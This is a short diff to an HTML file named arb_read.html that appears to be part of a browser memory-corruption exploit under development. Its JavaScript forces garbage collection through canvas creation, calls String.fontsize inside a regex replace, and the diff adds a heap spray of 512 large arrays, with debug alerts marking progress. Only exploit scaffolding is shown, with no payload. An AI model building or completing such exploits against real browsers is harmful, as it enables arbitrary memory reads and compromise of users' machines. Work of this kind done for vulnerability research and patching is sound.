--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start2");
+alert("start with spray");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -43,7 +43,12 @@ arr[i] = c.fontsize(1);
 }
 var s1 = c.fontsize(1) ;
 x.replace(/\d/g, s1);
+var spray=new Array(0x200);
+for(var i=0;i<spray.length;i++){
+ spray[i]=new Array(0x1000);   
+}
 alert("ok");
+
 var a=0;
 var b="";
 while(1){
